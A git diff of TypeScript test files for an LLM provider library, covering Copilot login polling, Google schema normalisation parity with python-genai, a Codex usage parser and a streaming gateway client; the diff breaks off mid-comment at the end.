describe("callWithCopilotModelRetry", () => { calls += 1; throw copilotError({ status: 400, code: "model_not_supported", message: "transient" }); }, - { provider: "github-copilot", signal: controller.signal }, + { provider: "github-copilot", signal: controller.signal, retryBaseDelayMs: 0 }, ), ).rejects.toBeDefined(); // fn runs once; scheduler.wait rejects before a second attempt. diff --git a/packages/ai/test/github-copilot-login.test.ts b/packages/ai/test/github-copilot-login.test.ts index 2e24dfea4..b4ff72e75 100644 --- a/packages/ai/test/github-copilot-login.test.ts +++ b/packages/ai/test/github-copilot-login.test.ts @@ -2,6 +2,7 @@ import { afterEach, describe, expect, it, vi } from "bun:test"; import { loginGitHubCopilot } from "../src/utils/oauth/github-copilot"; const originalFetch = global.fetch; +const FAST_POLL_OPTIONS = { pollIntervalFloorMs: 0, pollIntervalScaleMs: 1 } as const; afterEach(() => { global.fetch = originalFetch; @@ -59,6 +60,7 @@ describe("loginGitHubCopilot", () => { const onAuth = vi.fn(); const credentials = await loginGitHubCopilot({ + ...FAST_POLL_OPTIONS, onAuth, onPrompt: mockOnPrompt(""), }); @@ -94,6 +96,7 @@ describe("loginGitHubCopilot", () => { global.fetch = fetchMock as unknown as typeof fetch; const credentials = await loginGitHubCopilot({ + ...FAST_POLL_OPTIONS, onAuth: vi.fn(), onPrompt: mockOnPrompt("ghe.example.com"), }); @@ -125,6 +128,7 @@ describe("loginGitHubCopilot", () => { global.fetch = fetchMock as unknown as typeof fetch; const credentials = await loginGitHubCopilot({ + ...FAST_POLL_OPTIONS, onAuth: vi.fn(), onPrompt: mockOnPrompt(" "), }); @@ -191,6 +195,7 @@ describe("loginGitHubCopilot", () => { global.fetch = fetchMock as unknown as typeof fetch; const credentials = await loginGitHubCopilot({ + ...FAST_POLL_OPTIONS, onAuth: vi.fn(), onPrompt: mockOnPrompt(""), }); @@ -247,6 +252,7 @@ describe("loginGitHubCopilot", () => { await expect( loginGitHubCopilot({ + ...FAST_POLL_OPTIONS, onAuth: vi.fn(), onPrompt: mockOnPrompt(""), }), @@ -276,6 +282,7 @@ describe("loginGitHubCopilot", () => { global.fetch = fetchMock as unknown as typeof fetch; const credentials = await loginGitHubCopilot({ + ...FAST_POLL_OPTIONS, onAuth: vi.fn(), onPrompt: mockOnPrompt(""), }); diff --git a/packages/ai/test/google-system-prompt.test.ts b/packages/ai/test/google-system-prompt.test.ts index 42b8a29e9..f12d1e23b 100644 --- a/packages/ai/test/google-system-prompt.test.ts +++ b/packages/ai/test/google-system-prompt.test.ts @@ -1,7 +1,7 @@ import { afterEach, describe, expect, it, vi } from "bun:test"; -import { Models } from "@google/genai"; import { streamGoogle } from "@oh-my-pi/pi-ai/providers/google"; import type { Context, Model } from "@oh-my-pi/pi-ai/types"; +import { hookFetch } from "@oh-my-pi/pi-utils"; const model: Model<"google-generative-ai"> = { id: "gemini-3-pro-preview", @@ -20,9 +20,11 @@ async function captureGooglePayload( context: Context, ): Promise<{ config: { systemInstruction?: unknown }; contents: unknown[] }> { let captured: { config: { systemInstruction?: unknown }; contents: unknown[] } | undefined; - vi.spyOn(Models.prototype, "generateContentStream").mockImplementation(async function* () { - // No chunks needed; the test only validates the generated request payload. - } as never); + // Intercept the outgoing REST call so the streamGoogle promise resolves cleanly without + // hitting the network. The test only validates `onPayload` (which fires before fetch). + using _hook = hookFetch( + async () => new Response("", { status: 200, headers: { "content-type": "text/event-stream" } }), + ); await streamGoogle(model, context, { apiKey: "test-key", diff --git a/packages/ai/test/google-tool-schema.test.ts b/packages/ai/test/google-tool-schema.test.ts index 3d9792586..54cb3709f 100644 --- a/packages/ai/test/google-tool-schema.test.ts +++ b/packages/ai/test/google-tool-schema.test.ts @@ -1,7 +1,7 @@ import { describe, expect, it } from "bun:test"; import { convertTools } from "@oh-my-pi/pi-ai/providers/google-shared"; import type { Model, TJsonSchema, Tool } from "@oh-my-pi/pi-ai/types"; -import { prepareSchemaForCCA, sanitizeSchemaForCCA, sanitizeSchemaForGoogle } from "@oh-my-pi/pi-ai/utils/schema"; +import { normalizeSchemaForCCA, normalizeSchemaForGoogle } from "@oh-my-pi/pi-ai/utils/schema"; function createModel(id: string): Model<"google-gemini-cli"> { return { @@ -37,7 +37,7 @@ describe("Cloud Code Assist Claude tool schema conversion", () => { // normalizeTypeArrayToNullable converts type array to scalar + nullable, // then stripNullableKeyword removes the nullable marker. - expect(sanitizeSchemaForCCA(schema)).toEqual({ + expect(normalizeSchemaForCCA(schema)).toEqual({ type: "object", properties: { value: { @@ -59,7 +59,7 @@ describe("Cloud Code Assist Claude tool schema conversion", () => { }, } as unknown; - expect(sanitizeSchemaForCCA(schema)).toEqual({ + expect(normalizeSchemaForCCA(schema)).toEqual({ type: "object", properties: { env: { @@ -290,7 +290,7 @@ describe("Cloud Code Assist Claude tool schema conversion", () => { required: ["mode"], } as unknown; - expect(prepareSchemaForCCA(parameters)).toEqual({ + expect(normalizeSchemaForCCA(parameters)).toEqual({ type: "object", properties: {}, }); @@ -305,7 +305,7 @@ describe("Cloud Code Assist Claude tool schema conversion", () => { }, } as unknown; - expect(sanitizeSchemaForGoogle(schema)).toEqual({ + expect(normalizeSchemaForGoogle(schema)).toEqual({ type: "object", properties: { value: { @@ -316,3 +316,360 @@ describe("Cloud Code Assist Claude tool schema conversion", () => { }); }); }); + +/** + * Tests ported from python-genai's `process_schema`/`handle_null_fields` + * coverage in google/genai/tests/transformers/test_schema.py. The Python + * suite is the canonical regression set for the rules our `normalizeSchemaForGoogle` + * mirrors (snake_case field renames, null-field collapsing, const→enum, + * propertyOrdering propagation, $ref cycle handling). + */ +describe("normalizeSchemaForGoogle parity with python-genai process_schema", () => { + // Mirrors python-genai test_schema.py::test_schema_with_no_null_fields_is_unchanged + it("leaves anyOf alone when no variant has type null", () => { + const schema = { + anyOf: [{ type: "integer" }, { type: "number" }], + default: "null", + title: "Total Area Sq Mi", + } as const; + + expect(normalizeSchemaForGoogle(schema)).toEqual({ + anyOf: [{ type: "integer" }, { type: "number" }], + default: "null", + title: "Total Area Sq Mi", + }); + }); + + // Mirrors python-genai test_schema.py::test_t_schema_for_null_fields + it("collapses {type:'null'} variant in anyOf into nullable + sole remaining variant", () => { + const schema = { + type: "object", + properties: { + name: { type: "string" }, + population: { + anyOf: [{ type: "integer" }, { type: "null" }], + default: null, + title: "Population", + }, + }, + required: ["name"], + } as const; + + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; + const props = sanitized.properties as Record<string, Record<string, unknown>>; + expect(props.population?.nullable).toBe(true); + expect(props.population?.type).toBe("integer"); + expect(props.population?.anyOf).toBeUndefined(); + }); + + // Mirrors python-genai test_schema.py::test_schema_with_any_of + it("preserves multi-variant anyOf without any null variant", () => { + const schema = { + type: "object", + properties: { + name: { type: "string", title: "Name" }, + restaurants_per_capita: { + any_of: [{ type: "integer" }, { type: "number" }], + title: "Restaurants Per Capita", + }, + }, + required: ["name", "restaurants_per_capita"], + } as const; + + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; + const props = sanitized.properties as Record<string, Record<string, unknown>>; + // snake_case any_of must be rewritten to camelCase anyOf. + expect(props.restaurants_per_capita?.anyOf).toEqual([{ type: "integer" }, { type: "number" }]); + expect(props.restaurants_per_capita?.any_of).toBeUndefined(); + }); + + // Mirrors python-genai test_schema.py::test_complex_dict_schema_with_anyof_is_unchanged + it("leaves already-camelCased complex schemas unchanged apart from auto propertyOrdering", () => { + const dictSchema = { + type: "object", + title: "Fruit Basket", + description: "A structured representation of a fruit basket", + required: ["fruit"], + properties: { + fruit: { + type: "array", + description: "An ordered list of the fruit in the basket", + items: { + description: "A piece of fruit", + anyOf: [ + { + title: "Apple", + description: "Describes an apple", + type: "object", + properties: { + type: { type: "string", description: "Always 'apple'" }, + color: { type: "string", description: "The color of the apple" }, + }, + propertyOrdering: ["type", "color"], + required: ["type", "color"], + }, + { + title: "Orange", + description: "Describes an orange", + type: "object", + properties: { + type: { type: "string", description: "Always 'orange'" }, + size: { type: "string", description: "The size of the orange" }, + }, + propertyOrdering: ["type", "size"], + required: ["type", "size"], + }, + ], + }, + }, + }, + } as const; + + // fruit alone is the only top-level property; auto-ordering does not fire. + expect(normalizeSchemaForGoogle(dictSchema)).toEqual(dictSchema); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_converts_const_to_enum + it("converts const to a singleton enum", () => { + const sanitized = normalizeSchemaForGoogle({ type: "string", const: "FOO" }); + expect(sanitized).toEqual({ type: "string", enum: ["FOO"] }); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_forbids_non_string_const + // We deviate intentionally: rather than raise on non-string const we accept + // the value as a singleton enum. Google's Schema proto accepts numeric enums + // and we prefer permissive normalization over surfacing a transformer-level error. + it("accepts non-string const as a singleton enum (intentional deviation from upstream raise)", () => { + const sanitized = normalizeSchemaForGoogle({ type: "integer", const: 123 }) as Record<string, unknown>; + expect(sanitized.enum).toEqual([123]); + expect(sanitized.type).toBe("integer"); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_order_properties_propagates_into_defs + it("propagates auto propertyOrdering into inlined $defs targets", () => { + const schema = { + $ref: "#/$defs/Foo", + $defs: { + Foo: { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + }, + }, + } as const; + + expect(normalizeSchemaForGoogle(schema)).toEqual({ + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + propertyOrdering: ["foo", "bar"], + }); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_order_properties_propagates_into_items + it("propagates auto propertyOrdering into array items", () => { + const schema = { + type: "array", + items: { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + }, + } as const; + + expect(normalizeSchemaForGoogle(schema)).toEqual({ + type: "array", + items: { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + propertyOrdering: ["foo", "bar"], + }, + }); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_order_properties_propagates_into_properties + it("propagates auto propertyOrdering into nested properties", () => { + const schema = { + type: "object", + properties: { + xyz: { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + }, + abc: { type: "string" }, + }, + } as const; + + expect(normalizeSchemaForGoogle(schema)).toEqual({ + type: "object", + properties: { + xyz: { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + propertyOrdering: ["foo", "bar"], + }, + abc: { type: "string" }, + }, + propertyOrdering: ["xyz", "abc"], + }); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_order_properties_propagates_into_any_of + it("propagates auto propertyOrdering into anyOf variants", () => { + const schema = { + anyOf: [ + { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + }, + { type: "string" }, + ], + } as const; + + expect(normalizeSchemaForGoogle(schema)).toEqual({ + anyOf: [ + { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + propertyOrdering: ["foo", "bar"], + }, + { type: "string" }, + ], + }); + }); + + // Mirrors python-genai test_schema.py::test_process_schema_with_cycle + it("breaks $ref cycles by emitting an empty schema at the recursion point", () => { + const schema = { + type: "object", + properties: { + recursive: { $ref: "#/$defs/RecursiveObject" }, + }, + $defs: { + RecursiveObject: { + type: "object", + properties: { + self: { $ref: "#/$defs/RecursiveObject" }, + }, + }, + }, + } as const; + + expect(normalizeSchemaForGoogle(schema)).toEqual({ + type: "object", + properties: { + recursive: { + type: "object", + properties: { self: {} }, + }, + }, + }); + }); + + // Mirrors python-genai test_schema.py::test_t_schema_does_not_change_property_ordering_if_set + it("does not overwrite an existing propertyOrdering", () => { + const custom = ["code", "symbol", "name"]; + const schema = { + type: "object", + properties: { + name: { type: "string" }, + code: { type: "string" }, + symbol: { type: "string" }, + }, + propertyOrdering: [...custom], + } as const; + + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; + expect(sanitized.propertyOrdering).toEqual(custom); + }); + + // Mirrors python-genai test_schema.py::test_t_schema_sets_property_ordering_for_json_schema + it("populates propertyOrdering from properties insertion order when missing", () => { + const schema = { + type: "object", + properties: { + name: { type: "string" }, + population: { type: "integer" }, + capital: { type: "string" }, + continent: { type: "string" }, + gdp: { type: "integer" }, + official_language: { type: "string" }, + total_area_sq_mi: { type: "integer" }, + }, + } as const; + + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; + expect(sanitized.propertyOrdering).toEqual([ + "name", + "population", + "capital", + "continent", + "gdp", + "official_language", + "total_area_sq_mi", + ]); + }); + + // Covers python-genai _transformers.py:745-752 snake_case → camelCase renames. + it("normalizes snake_case schema field names to camelCase", () => { + const schema = { + type: "object", + properties: { + foo: { type: "string" }, + bar: { type: "string" }, + }, + property_ordering: ["bar", "foo"], + } as const; + + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; + expect(sanitized.propertyOrdering).toEqual(["bar", "foo"]); + expect(sanitized.property_ordering).toBeUndefined(); + }); + + // Covers python-genai _transformers.py:751 snake-wins-over-camel collision behavior. + it("lets snake_case overwrite an existing camelCase entry on collision", () => { + const schema = { + anyOf: [{ type: "string" }], + any_of: [{ type: "integer" }, { type: "number" }], + } as const; + + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; + expect(sanitized.anyOf).toEqual([{ type: "integer" }, { type: "number" }]); + expect(sanitized.any_of).toBeUndefined(); + }); + + // Covers python-genai _transformers.py:628-630 bare {type:'null'} flatten. + it("rewrites a bare {type:'null'} schema as {nullable:true}", () => { + expect(normalizeSchemaForGoogle({ type: "null" })).toEqual({ nullable: true }); + }); + + // Covers python-genai _transformers.py:631-640 single-non-null anyOf flatten. + it("flattens anyOf:[X, {type:'null'}] into X + nullable", () => { + expect( + normalizeSchemaForGoogle({ + anyOf: [{ type: "string", title: "Name" }, { type: "null" }], + }), + ).toEqual({ type: "string", title: "Name", nullable: true }); + }); +}); diff --git a/packages/ai/test/helpers/index.ts b/packages/ai/test/helpers/index.ts index 7f6b1158d..700f673b2 100644 --- a/packages/ai/test/helpers/index.ts +++ b/packages/ai/test/helpers/index.ts @@ -1,5 +1,8 @@ +import * as os from "node:os"; +import * as path from "node:path"; import { enrichModelThinking } from "@oh-my-pi/pi-ai/model-thinking"; import type { Model } from "@oh-my-pi/pi-ai/types"; +import { isEnoent } from "@oh-my-pi/pi-utils"; export async function withEnv( overrides: Record<string, string | undefined>, @@ -65,3 +68,44 @@ export function createCodexModel(id: string): Model<"openai-codex-responses"> { maxTokens: 128000, }); } + +export interface AuthGatewayE2EStatus { + ok: boolean; + token?: string; + reason?: string; +} + +export const AUTH_GATEWAY_E2E_URL = Bun.env.OMP_E2E_GATEWAY_URL ?? "http://127.0.0.1:4000"; + +const AUTH_GATEWAY_TOKEN_PATH = path.join(os.homedir(), ".omp", "auth-gateway.token"); +const AUTH_GATEWAY_HEALTH_TIMEOUT_MS = 500; + +let authGatewayE2EStatus: Promise<AuthGatewayE2EStatus> | undefined; + +export function checkAuthGatewayE2EAvailable(): Promise<AuthGatewayE2EStatus> { + authGatewayE2EStatus ??= readAuthGatewayE2EStatus(); + return authGatewayE2EStatus; +} + +async function readAuthGatewayE2EStatus(): Promise<AuthGatewayE2EStatus> { + if (!Bun.env.E2E) return { ok: false, reason: "E2E env not set" }; + let token: string; + try { + token = (await Bun.file(AUTH_GATEWAY_TOKEN_PATH).text()).trim(); + } catch (err) { + if (isEnoent(err)) return { ok: false, reason: `no token at ${AUTH_GATEWAY_TOKEN_PATH}` }; + throw err; + } + if (!token) return { ok: false, reason: `empty token at ${AUTH_GATEWAY_TOKEN_PATH}` }; + + try { + const res = await fetch(`${AUTH_GATEWAY_E2E_URL}/healthz`, { + signal: AbortSignal.timeout(AUTH_GATEWAY_HEALTH_TIMEOUT_MS), + }); + if (!res.ok) return { ok: false, reason: `healthz returned ${res.status}` }; + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + return { ok: false, reason: `healthz unreachable: ${msg}` }; + } + return { ok: true, token }; +} diff --git a/packages/ai/test/openai-codex-usage.test.ts b/packages/ai/test/openai-codex-usage.test.ts new file mode 100644 index 000000000..626646402 --- /dev/null +++ b/packages/ai/test/openai-codex-usage.test.ts @@ -0,0 +1,128 @@ +/** + * Codex usage parser regressions. The widget client (osx-widgets) keys spark + * detection off `limit.id.includes("spark")`, so the parser MUST surface + * `additional_rate_limits[].metered_feature == "codex_bengalfox"` (the upstream + * codename for GPT-5.3-Codex-Spark) as separate `UsageLimit` entries with + * `spark` in the id. If this contract breaks, both the TUI and the macOS + * widget lose per-model visibility. + */ +import { describe, expect, it } from "bun:test"; +import { openaiCodexUsageProvider } from "../src/usage/openai-codex"; + +const accessTokenFixture = (() => { + const header = Buffer.from(JSON.stringify({ alg: "none", typ: "JWT" })).toString("base64url"); + const body = Buffer.from( + JSON.stringify({ + "https://api.openai.com/auth": { chatgpt_account_id: "acct-fixture" }, + "https://api.openai.com/profile": { email: "fixture@example.com" }, + }), + ).toString("base64url"); + return `${header}.${body}.sig`; +})(); + +function makePayload() { + return { + plan_type: "pro", + rate_limit: { + allowed: true, + limit_reached: false, + primary_window: { used_percent: 4, limit_window_seconds: 17940, reset_at: 2_000_000_000 }, + secondary_window: { used_percent: 1, limit_window_seconds: 604740, reset_at: 2_000_500_000 }, + }, + additional_rate_limits: [ + { + limit_name: "GPT-5.3-Codex-Spark", + metered_feature: "codex_bengalfox", + rate_limit: { + allowed: true, + limit_reached: false, + primary_window: { used_percent: 17, limit_window_seconds: 18000, reset_at: 2_000_001_000 }, + secondary_window: { used_percent: 61, limit_window_seconds: 604800, reset_at: 2_000_600_000 }, + }, + }, + ], + }; +} + +function fakeFetch(payload: unknown): typeof fetch { + const fn = async () => + new Response(JSON.stringify(payload), { status: 200, headers: { "content-type": "application/json" } }); + return fn as unknown as typeof fetch; +} + +describe("openai-codex usage parser", () => { + it("emits primary + secondary limits from the main rate_limit block", async () => { + const report = await openaiCodexUsageProvider.fetchUsage( + { + provider: "openai-codex", + credential: { type: "oauth", accessToken: accessTokenFixture, accountId: "acct-1", email: "u@example.com" }, + }, + { fetch: fakeFetch(makePayload()) }, + ); + expect(report).not.toBeNull(); + const main = report?.limits.filter(l => l.id === "openai-codex:primary" || l.id === "openai-codex:secondary"); + expect(main?.map(l => l.id)).toEqual(["openai-codex:primary", "openai-codex:secondary"]); + expect(main?.[0].scope.tier).toBe("pro"); + expect(main?.[0].amount.usedFraction).toBeCloseTo(0.04, 5); + }); + + it("surfaces additional_rate_limits as spark UsageLimit entries the widget can detect", async () => { + const report = await openaiCodexUsageProvider.fetchUsage( + { + provider: "openai-codex", + credential: { type: "oauth", accessToken: accessTokenFixture, accountId: "acct-1", email: "u@example.com" }, + }, + { fetch: fakeFetch(makePayload()) }, + ); + const spark = report?.limits.filter(l => l.id.includes("spark")); + expect(spark?.map(l => l.id)).toEqual(["openai-codex:spark:primary", "openai-codex:spark:secondary"]); + expect(spark?.[0].label).toBe("5 hours (Spark)"); + expect(spark?.[1].label).toBe("7 days (Spark)"); + expect(spark?.[0].scope.tier).toBe("spark"); + expect(spark?.[0].scope.modelId).toBe("GPT-5.3-Codex-Spark"); + expect(spark?.[0].amount.usedFraction).toBeCloseTo(0.17, 5); + expect(spark?.[1].amount.usedFraction).toBeCloseTo(0.61, 5); + }); + + it("treats bengalfox codename as spark even without explicit limit_name", async () => { + const payload = makePayload(); + payload.additional_rate_limits[0].limit_name = undefined as unknown as string; + const report = await openaiCodexUsageProvider.fetchUsage( + { + provider: "openai-codex", + credential: { type: "oauth", accessToken: accessTokenFixture, accountId: "acct-1", email: "u@example.com" }, + }, + { fetch: fakeFetch(payload) }, + ); + const spark = report?.limits.find(l => l.id === "openai-codex:spark:primary"); + expect(spark).toBeTruthy(); + expect(spark?.scope.tier).toBe("spark"); + }); + + it("returns a report even when only additional_rate_limits are present (no main rate_limit)", async () => { + const payload = { + plan_type: "pro", + rate_limit: null, + additional_rate_limits: [ + { + limit_name: "GPT-5.3-Codex-Spark", + metered_feature: "codex_bengalfox", + rate_limit: { + allowed: true, + limit_reached: false, + primary_window: { used_percent: 5, limit_window_seconds: 18000, reset_at: 2_000_000_000 }, + }, + }, + ], + }; + const report = await openaiCodexUsageProvider.fetchUsage( + { + provider: "openai-codex", + credential: { type: "oauth", accessToken: accessTokenFixture, accountId: "acct-1", email: "u@example.com" }, + }, + { fetch: fakeFetch(payload) }, + ); + expect(report).not.toBeNull(); + expect(report?.limits.map(l => l.id)).toEqual(["openai-codex:spark:primary"]); + }); +}); diff --git a/packages/ai/test/pi-native-client.test.ts b/packages/ai/test/pi-native-client.test.ts new file mode 100644 index 000000000..2c8627454 --- /dev/null +++ b/packages/ai/test/pi-native-client.test.ts @@ -0,0 +1,304 @@ +import { afterEach, describe, expect, it, mock, spyOn } from "bun:test"; +import { streamPiNative } from "../src/providers/pi-native-client"; +import type { AssistantMessage, AssistantMessageEvent, Context, FetchImpl, Model } from "../src/types"; + +function sseBytes(events: AssistantMessageEvent[]): Uint8Array { + const encoder = new TextEncoder(); + const parts: Uint8Array[] = []; + for (const event of events) { + parts.push(encoder.encode(`data: ${JSON.stringify(event)}\n\n`)); + } + parts.push(encoder.encode("data: [DONE]\n\n")); + const total = parts.reduce((n, p) => n + p.byteLength, 0); + const out = new Uint8Array(total); + let offset = 0; + for (const part of parts) { + out.set(part, offset); + offset += part.byteLength; + } + return out; +} + +function fakeBody(bytes: Uint8Array): ReadableStream<Uint8Array> { + return new ReadableStream<Uint8Array>({ + start(controller) { + controller.enqueue(bytes); + controller.close(); + }, + }); +} + +function fakeResponse(events: AssistantMessageEvent[], init: ResponseInit = {}): Response { + return new Response(fakeBody(sseBytes(events)), { + status: 200, + headers: { "Content-Type": "text/event-stream" }, + ...init, + }); +} + +function baseAssistant(overrides: Partial<AssistantMessage> = {}): AssistantMessage { + return { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-sonnet-4-5", + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "stop", + timestamp: 0, + ...overrides, + }; +} + +function fakeModel(overrides: Partial<Model<"anthropic-messages">> = {}): Model<"anthropic-messages"> { + return { + id: "claude-sonnet-4-5", + name: "Claude Sonnet 4.5", + api: "anthropic-messages", + provider: "anthropic", + baseUrl: "http://llm-gateway.internal:4000", + reasoning: true, + input: ["text"], + cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + transport: "pi-native", + ...overrides, + }; +} + +const baseContext: Context = { + systemPrompt: ["you are helpful"], + messages: [{ role: "user", content: "hi", timestamp: 0 }], +}; + +async function collectEvents(stream: AsyncIterable<AssistantMessageEvent>): Promise<AssistantMessageEvent[]> { + const out: AssistantMessageEvent[] = []; + for await (const event of stream) out.push(event); + return out; +} + +afterEach(() => { + mock.restore(); +}); + +describe("streamPiNative request shape", () => { + it("POSTs `{modelId, context, options, stream:true}` to `<baseUrl>/v1/pi/stream`", async () => { + const final = baseAssistant(); + const captured: { url?: string; init?: RequestInit } = {}; + const fetchImpl: FetchImpl = (async (input, init) => { + captured.url = typeof input === "string" ? input : input.toString(); + captured.init = init; + return fakeResponse([{ type: "done", reason: "stop", message: final }]); + }) as FetchImpl; + + const stream = streamPiNative(fakeModel(), baseContext, { + apiKey: "gw-bearer", + fetch: fetchImpl, + temperature: 0.7, + }); + await stream.result(); + + expect(captured.url).toBe("http://llm-gateway.internal:4000/v1/pi/stream"); + expect(captured.init?.method).toBe("POST"); + const headers = captured.init?.headers as Record<string, string>; + expect(headers["Content-Type"]).toBe("application/json"); + expect(headers.Accept).toBe("text/event-stream"); + expect(headers.Authorization).toBe("Bearer gw-bearer"); + + const body = JSON.parse(captured.init?.body as string); + expect(body.modelId).toBe("claude-sonnet-4-5"); + expect(body.context).toEqual(baseContext); + expect(body.stream).toBe(true); + expect(body.options.temperature).toBe(0.7); + }); + + it("strips non-wire fields (signal, apiKey, fetch, callbacks) from `options`", async () => { + // `apiKey` must ride in the Authorization header, never the body — sending + // it twice would let a logged request leak the gateway bearer. The other + // fields are non-serializable function/runtime handles. + const captured: { init?: RequestInit } = {}; + const fetchImpl: FetchImpl = (async (_input, init) => { + captured.init = init; + return fakeResponse([{ type: "done", reason: "stop", message: baseAssistant() }]); + }) as FetchImpl; + + const controller = new AbortController(); + const stream = streamPiNative(fakeModel(), baseContext, { + apiKey: "gw-bearer", + fetch: fetchImpl, + signal: controller.signal, + onPayload: () => undefined, + onResponse: () => undefined, + onSseEvent: () => undefined, + providerSessionState: new Map(), + maxTokens: 1024, + }); + await stream.result(); + + const body = JSON.parse(captured.init?.body as string); + expect("apiKey" in body.options).toBe(false); + expect("signal" in body.options).toBe(false); + expect("fetch" in body.options).toBe(false); + expect("onPayload" in body.options).toBe(false); + expect("onResponse" in body.options).toBe(false); + expect("onSseEvent" in body.options).toBe(false); + expect("providerSessionState" in body.options).toBe(false); + // And the legitimate options survive + expect(body.options.maxTokens).toBe(1024); + }); + + it("normalizes trailing slashes on `baseUrl` so the endpoint never double-slashes", async () => { + const captured: { url?: string } = {}; + const fetchImpl: FetchImpl = (async (input, _init) => { + captured.url = typeof input === "string" ? input : input.toString(); + return fakeResponse([{ type: "done", reason: "stop", message: baseAssistant() }]); + }) as FetchImpl; + + await streamPiNative(fakeModel({ baseUrl: "http://llm-gateway.internal:4000///" }), baseContext, { + apiKey: "k", + fetch: fetchImpl, + }).result(); + expect(captured.url).toBe("http://llm-gateway.internal:4000/v1/pi/stream"); + }); + + it("forwards `model.headers` and lets a caller-supplied Authorization win", async () => { + const captured: { init?: RequestInit } = {}; + const fetchImpl: FetchImpl = (async (_input, init) => { + captured.init = init; + return fakeResponse([{ type: "done", reason: "stop", message: baseAssistant() }]); + }) as FetchImpl; + + await streamPiNative( + fakeModel({ headers: { "x-omp-slot": "robomp-1", Authorization: "Bearer model-wins" } }), + baseContext, + { apiKey: "options-loses", fetch: fetchImpl }, + ).result(); + + const headers = captured.init?.headers as Record<string, string>; + expect(headers["x-omp-slot"]).toBe("robomp-1"); + expect(headers.Authorization).toBe("Bearer model-wins"); + }); + + it("throws synchronously when `baseUrl` is missing", async () => { + const broken = fakeModel({ baseUrl: "" as unknown as string }); + // The promise the iterator awaits surfaces the error via `.result()`. + const stream = streamPiNative(broken, baseContext, { apiKey: "k" }); + await expect(stream.result()).rejects.toThrow(/baseUrl/); + }); +}); + +describe("streamPiNative event flow", () => { + it("pushes parsed events verbatim and resolves `.result()` on terminal `done`", async () => { + const final = baseAssistant({ + content: [{ type: "text", text: "hi" }], + usage: { + input: 4, + output: 2, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 6, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + }); + const partial = baseAssistant({ content: [{ type: "text", text: "hi" }] }); + const events: AssistantMessageEvent[] = [ + { type: "start", partial: baseAssistant() }, + { type: "text_delta", contentIndex: 0, delta: "hi", partial }, + { type: "done", reason: "stop", message: final }, + ]; + const fetchImpl: FetchImpl = (async () => fakeResponse(events)) as FetchImpl; + + const stream = streamPiNative(fakeModel(), baseContext, { apiKey: "k", fetch: fetchImpl }); + const seen = await collectEvents(stream); + const result = await stream.result(); + + expect(seen).toEqual(events); + expect(result).toEqual(final); + }); + + it("classifies non-2xx responses into Errors with status + type tags", async () => { + const fetchImpl: FetchImpl = (async () => + new Response(JSON.stringify({ error: { type: "authentication_error", message: "no credential" } }), { + status: 401, + headers: { "Content-Type": "application/json" }, + })) as FetchImpl; + + const stream = streamPiNative(fakeModel(), baseContext, { apiKey: "k", fetch: fetchImpl }); + await expect(stream.result()).rejects.toThrow(/no credential/); + }); + + it("falls back to plain text on a non-JSON error body", async () => { + const fetchImpl: FetchImpl = (async () => new Response("bad gateway", { status: 502 })) as FetchImpl; + const stream = streamPiNative(fakeModel(), baseContext, { apiKey: "k", fetch: fetchImpl }); + await expect(stream.result()).rejects.toThrow(/502/); + }); + + it("synthesizes a terminal `done` when the SSE stream closes silently", async () => { + // Models the gateway dropping mid-stream — without this synthetic terminator, + // `.result()` would hang forever. + const halfEvents: AssistantMessageEvent[] = [{ type: "start", partial: baseAssistant() }]; + const encoder = new TextEncoder(); + const body = new ReadableStream<Uint8Array>({ + start(controller) { + for (const e of halfEvents) controller.enqueue(encoder.encode(`data: ${JSON.stringify(e)}\n\n`)); + controller.close(); + }, + }); + const fetchImpl: FetchImpl = (async () => + new Response(body, { status: 200, headers: { "Content-Type": "text/event-stream" } })) as FetchImpl; + + const stream = streamPiNative(fakeModel(), baseContext, { apiKey: "k", fetch: fetchImpl }); + const seen = await collectEvents(stream); + expect(seen.length).toBeGreaterThanOrEqual(2); + expect(seen[seen.length - 1].type).toBe("done"); + + const result = await stream.result(); + expect(result.role).toBe("assistant"); + expect(result.stopReason).toBe("stop"); + }); + + it("fails fast when the caller's signal is already aborted before fetch fires", async () => { + const fetchImpl = spyOn({ fetch: globalThis.fetch }, "fetch") as unknown as FetchImpl; + const controller = new AbortController(); + controller.abort(new Error("pre-aborted")); + + const stream = streamPiNative(fakeModel(), baseContext, { + apiKey: "k", + fetch: fetchImpl, + signal: controller.signal, + }); + + await expect(stream.result()).rejects.toThrow(/pre-aborted/); + // fetch was never called — short-circuit happened in the abort guard + expect((fetchImpl as unknown as ReturnType<typeof spyOn>).mock.calls.length).toBe(0); + }); + + it("forwards the caller's AbortSignal to the underlying fetch", async () => { + // The real abort path runs through fetch — its body is wired to the + // signal by the runtime. We test the contract we guarantee (signal + // forwarding); body-cancel hooks are a best-effort backstop on the + // `streamProxy` shape, and not worth asserting through a 